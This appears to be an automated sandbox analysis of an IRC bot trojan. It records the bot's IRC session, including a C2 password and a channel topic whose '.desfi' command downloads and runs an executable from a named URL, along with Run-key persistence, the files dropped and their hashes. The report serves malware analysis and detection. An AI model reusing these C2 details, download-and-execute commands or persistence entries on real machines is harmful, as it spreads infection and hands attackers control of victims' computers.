216.66.78.116

Remote Host       Port Number
206.188.193.39    80
216.66.78.116     6567

MODE [SH|USA|00|P|33762] -ix
JOIN #salvando# c1rc0s0leil
PRIVMSG #salvando# :[Dl]: File download: 117.7KB to: c:\windows\wichin.exe @ 117.7KB/sec.
PRIVMSG #salvando# :[Dl]: Created process: "c:\windows\wichin.exe", PID:
PONG Google.Rules.Com
NICK [SH|USA|00|P|33762]
USER XP-9702 * 0 :COMPUTERNAME
Now talking in #salvando#
Topic On: [ #salvando# ] [ .desfi http://www.johngarzon.com.co/menu/xd/wichin.exe c:\windows\wichin.exe 1 ]
Topic By: [ Google ]
Modes On: [ #salvando# ] [ +smntMu ]

PASS pr1v4d0onl1n3r

* The data identified by the following URL was then requested from the remote web server:
    - http://www.johngarzon.com.co/menu/xd/wichin.exe

* The following port was open in the system:

    Port    Protocol    Process
    1053    TCP         conmsyrtl.exe (%Windir%\conmsyrtl.exe)

Registry Modifications

* The following Registry Keys were created:
    - HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
    - HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel

* The newly created Registry Values are:
    - [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
        + Sistema de Comm = "conmsyrtl.exe"

      so that conmsyrtl.exe runs every time Windows starts
    - [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run]
        + Sistema de Comm = "conmsyrtl.exe"

      so that conmsyrtl.exe runs every time Windows starts
    - [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
        + HomePage = 0x00000001

* The following Registry Value was modified:
    - [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
        + Start Page =

Memory Modifications

* There were new processes created in the system:

    Process Name     Process Filename          Main Module Size
    conmsyrtl.exe    %Windir%\conmsyrtl.exe    331 776 bytes
    wichin.exe       %Windir%\wichin.exe       20 480 bytes

File System Modifications

* The following files were created in the system:

    #    Filename(s)                             File Size        File Hash
    1    %Windir%\conmsyrtl.exe                  153 254 bytes    MD5:   0x8F92EBBE21B834107F4A1CFD95F28F71
         [file and pathname of the sample #1]                     SHA-1: 0x06337C454ECEC5E3217C8A6772E7F712E39C2F2E
    2    %Windir%\wichin.exe                     120 489 bytes    MD5:   0xBED0834231040FA354233E2FB2F601B9
                                                                  SHA-1: 0x8F28AB98BFE82BF3BC96CF5E64D5EE17E7E0E448
